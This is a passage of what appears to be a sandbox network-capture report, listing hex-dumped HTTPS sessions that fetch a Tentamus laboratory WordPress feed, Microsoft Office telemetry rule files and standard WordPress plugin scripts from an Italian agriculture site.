                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 64 20 50 68 61 72 6d 61 22 2c 22 69 6e 64 75 73 74 72 79 22 3a 5b 22 2a 22 2c 31 5d 2c 22 73 65 72 76 69 63 65 22 3a 5b 22 2a 22 2c 35 2c 34 2c 33 2c 31 2c 32 5d 2c 22 6c 61 6e 67 22 3a 22 64 65 5f 44 45 22 2c 22 72 65 6c 61 74 65 64 22 3a 7b 22 65 6e 5f 55 53 22 3a 35 32 2c 22 65 73 5f 45 53 22 3a 35 34 7d 2c 22 6f 70 74 69 6f 6e 73 22 3a 7b 22 61 64 72 65 73 73 22 3a 22 3c 70 3e 3c 73 70 61 6e 3e 51 53 49 20 47 6d 62 48 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 5c 6e 3c 73 70 61 6e 3e 46 6c 75 67 68 61 66 65 6e 64 61 6d 6d 20 39 61 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 5c 6e 3c 73 70 61 6e 3e 32 38 31 39 39 20 42 72 65 6d 65 6e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 5c 6e 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 39 65 33 33 36 61 22
                                                                                                                                          Data Ascii: d Pharma","industry":["*",1],"service":["*",5,4,3,1,2],"lang":"de_DE","related":{"en_US":52,"es_ES":54},"options":{"adress":"<p><span>QSI GmbH</span><br />\n<span>Flughafendamm 9a</span><br />\n<span>28199 Bremen</span></p>\n","background_color":"#9e336a"
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 7a 69 61 6c 6c 5c 75 30 30 66 36 73 75 6e 67 65 6e 2c 20 64 69 65 20 6b 65 69 6e 65 20 57 5c 75 30 30 66 63 6e 73 63 68 65 20 6f 66 66 65 6e 20 6c 61 73 73 65 6e 2e 3c 2f 70 3e 5c 6e 3c 70 20 61 6c 69 67 6e 3d 5c 22 6a 75 73 74 69 66 79 5c 22 3e 44 75 72 63 68 20 75 6e 73 65 72 65 20 65 69 6e 7a 69 67 61 72 74 69 67 65 20 46 75 6c 6c 2d 53 65 72 76 69 63 65 2d 55 6e 74 65 72 6e 65 68 6d 65 6e 73 76 65 72 62 75 6e 64 20 75 6e 74 65 72 20 64 65 6d 20 44 61 63 68 20 64 65 72 20 54 65 6e 74 61 6d 75 73 20 73 69 6e 64 20 77 69 72 20 69 6e 20 64 65 72 20 4c 61 67 65 20 64 69 65 20 6b 6f 6d 70 6c 65 74 74 65 20 44 4e 41 2d 41 6e 61 6c 79 74 69 6b 20 75 6e 64 20 69 6e 6e 6f 76 61 74 69 76 65 20 4c 5c 75 30 30 66 36 73 75 6e 67 65 6e 20 66 5c 75 30 30 66 63 72 20
                                                                                                                                          Data Ascii: ziall\u00f6sungen, die keine W\u00fcnsche offen lassen.</p>\n<p align=\"justify\">Durch unsere einzigartige Full-Service-Unternehmensverbund unter dem Dach der Tentamus sind wir in der Lage die komplette DNA-Analytik und innovative L\u00f6sungen f\u00fcr
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 5c 22 3e 26 23 38 32 32 30 3b 41 6e 74 69 6d 69 63 72 6f 62 69 61 6c 20 41 63 74 69 76 69 74 69 65 73 20 6f 66 20 41 6d 69 6e 65 2d 20 61 6e 64 20 47 75 61 6e 69 64 69 6e 65 2d 46 75 6e 63 74 69 6f 6e 61 6c 69 7a 65 64 20 43 68 6f 6c 69 63 20 41 63 69 64 20 44 65 72 69 76 61 74 69 76 65 73 2e 26 23 38 32 32 31 3b 3c 2f 61 3e 3c 2f 70 3e 5c 6e 3c 70 3e 3c 73 70 61 6e 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 77 65 20 61 72 65 20 61 20 66 6f 75 6e 64 69 6e 67 20 6d 65 6d 62 65 72 20 6f 66 20 4e 75 74 72 61 63 65 75 74 69 63 61 6c 20 61 6e 64 20 49 6e 64 75 73 74 72 69 61 6c 20 4d 69 63 72 6f 62 69 6f 6c 6f 67 69 73 74 73 20 6f 66 20 55 74 61 68 20 28 4e 49 4d
                                                                                                                                          Data Ascii: target=\"_blank\" rel=\"noopener\">&#8220;Antimicrobial Activities of Amine- and Guanidine-Functionalized Cholic Acid Derivatives.&#8221;</a></p>\n<p><span>Additionally, we are a founding member of Nutraceutical and Industrial Microbiologists of Utah (NIM
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 31 36 2f 32 30 32 30 2f 30 36 2f 63 6f 6c 75 6d 62 69 61 2d 6c 61 62 6f 72 61 74 6f 72 69 65 73 2d 70 72 65 73 73 65 62 6f 78 2d 65 31 35 39 31 31 38 38 31 32 31 33 34 30 2e 6a 70 67 22 2c 22 32 30 34 38 78 32 30 34 38 2d 77 69 64 74 68 22 3a 37 30 30 2c 22 32 30 34 38 78 32 30 34 38 2d 68 65 69 67 68 74 22 3a 32 32 39 2c 22 6e 65 77 73 2d 74 68 75 6d 62 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 31 36 2f 32 30 32 30 2f 30 36 2f 63 6f 6c 75 6d 62 69 61 2d 6c 61 62 6f 72 61 74 6f 72 69 65 73 2d 70 72 65 73 73 65 62 6f 78 2d 33 35 30 78 32 33 36 2e 6a 70 67 22 2c 22 6e 65 77 73
                                                                                                                                          Data Ascii: ent/uploads/sites/16/2020/06/columbia-laboratories-pressebox-e1591188121340.jpg","2048x2048-width":700,"2048x2048-height":229,"news-thumb":"https://www.tentamus-web.com/wp-content/uploads/sites/16/2020/06/columbia-laboratories-pressebox-350x236.jpg","news
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 22 6d 6f 64 69 66 69 65 64 22 3a 22 32 30 31 39 2d 30 31 2d 32 32 20 31 32 3a 30 31 3a 35 30 22 2c 22 6d 65 6e 75 5f 6f 72 64 65 72 22 3a 30 2c 22 6d 69 6d 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 73 75 62 74 79 70 65 22 3a 22 70 6e 67 22 2c 22 69 63 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 73 2d 61 6e 61 6c 79 74 69 6b 2e 64 65 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 69 6d 61 67 65 73 2f 6d 65 64 69 61 2f 64 65 66 61 75 6c 74 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 37 32 34 2c 22 68 65 69 67 68 74 22 3a 33 31 37 2c 22 73 69 7a 65 73 22 3a 7b 22 74 68 75 6d 62 6e 61 69 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70
                                                                                                                                          Data Ascii: "modified":"2019-01-22 12:01:50","menu_order":0,"mime_type":"image/png","type":"image","subtype":"png","icon":"https://www.bls-analytik.de/wp-includes/images/media/default.png","width":724,"height":317,"sizes":{"thumbnail":"https://www.tentamus-web.com/wp
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 68 74 20 66 5c 75 30 30 66 63 72 20 53 63 68 6e 65 6c 6c 69 67 6b 65 69 74 2c 20 7a 75 76 65 72 6c 5c 75 30 30 65 34 73 73 69 67 65 20 45 72 67 65 62 6e 69 73 73 65 20 75 6e 64 20 46 6c 65 78 69 62 69 6c 69 74 5c 75 30 30 65 34 74 2e 20 44 69 65 73 20 65 72 72 65 69 63 68 65 6e 20 77 69 72 20 64 75 72 63 68 20 68 6f 68 65 20 53 70 65 7a 69 61 6c 69 73 69 65 72 75 6e 67 2c 20 6b 6f 6d 70 65 74 65 6e 74 65 20 4d 69 74 61 72 62 65 69 74 65 72 20 75 6e 64 20 6c 61 6e 67 6a 5c 75 30 30 65 34 68 72 69 67 65 20 45 72 66 61 68 72 75 6e 67 2e 20 41 6c 73 20 4d 69 74 67 6c 69 65 64 20 64 65 72 20 54 65 6e 74 61 6d 75 73 2d 4c 61 62 6f 72 65 20 62 69 65 74 65 6e 20 77 69 72 20 49 68 6e 65 6e 20 67 6c 65 69 63 68 7a 65 69 74 69 67 20 65 69 6e 65 20 62 72 65 69 74 65
                                                                                                                                          Data Ascii: ht f\u00fcr Schnelligkeit, zuverl\u00e4ssige Ergebnisse und Flexibilit\u00e4t. Dies erreichen wir durch hohe Spezialisierung, kompetente Mitarbeiter und langj\u00e4hrige Erfahrung. Als Mitglied der Tentamus-Labore bieten wir Ihnen gleichzeitig eine breite
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 32 31 2f 32 30 31 37 2f 30 32 2f 4c 6f 67 6f 5f 5f 30 30 31 30 5f 42 41 56 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 32 31 2f 32 30 31 37 2f 30 32 2f 4c 6f 67 6f 5f 5f 30 30 31 30 5f 42 41 56 2e 6a 70 67 22 2c 22 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 31 35 33 36 78 31 35 33 36 22
                                                                                                                                          Data Ascii: b.com/wp-content/uploads/sites/21/2017/02/Logo__0010_BAV.jpg","medium_large-width":300,"medium_large-height":111,"large":"https://www.tentamus-web.com/wp-content/uploads/sites/21/2017/02/Logo__0010_BAV.jpg","large-width":300,"large-height":111,"1536x1536"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          85192.168.2.44984513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:05 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 427
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                                          x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103305Z-174f7845968glpgnhC1EWR7uec0000000yhg000000001bnk
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:05 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          86192.168.2.44984613.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:05 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 486
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                                          x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103305Z-174f7845968pf68xhC1EWRr4h80000000yk0000000004fqt
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          87192.168.2.4498505.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:05 UTC408OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:18 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 31 May 2023 06:59:20 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 12943
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:05 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:18 UTC7876INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 74 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d 2c 5b 22 76 61 6c 69 64 61 74 69 6f 6e 5f 66 61 69 6c 65 64 22 2c 22 69 6e 76 61 6c 69 64 22 5d 2c 5b 22 61 63 63 65 70 74 61 6e 63 65 5f 6d 69 73 73 69 6e 67 22 2c 22 75 6e 61 63 63 65 70 74 65 64 22 5d 2c 5b 22 73 70 61 6d 22 2c 22 73 70 61 6d 22 5d 2c 5b 22 61 62 6f 72 74 65 64 22 2c 22 61 62 6f 72 74 65 64 22 5d 2c 5b 22 6d 61 69 6c 5f 73 65 6e 74 22 2c 22 73 65 6e 74 22 5d 2c 5b 22 6d 61 69 6c 5f 66 61 69 6c 65 64 22 2c 22 66 61 69 6c 65 64 22 5d 2c 5b 22 73 75 62
                                                                                                                                          Data Ascii: (()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const a=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["sub


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          88192.168.2.4498155.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:06 UTC402OUTGET /wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          89192.168.2.44985213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:06 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:06 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 407
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                                          x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103306Z-174f7845968psccphC1EWRuz9s0000000ymg000000002qwq
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          90192.168.2.4498565.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:06 UTC569OUTGET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:07 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 02 Nov 2020 09:05:06 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 5629
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:07 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:07 UTC5629INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 34 2e 31 2e 34 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 65 76 2d 65 6d 69 74 74 65 72 2f 65 76 2d 65 6d 69 74 74 65 72 22 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                          Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v4.1.4 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          91192.168.2.44985513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 415
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                                          x-ms-request-id: 4b7a7cb4-201e-000c-0405-4179c4000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103307Z-174f7845968kdththC1EWRzvxn0000000ar000000000233t
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          92192.168.2.4498575.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
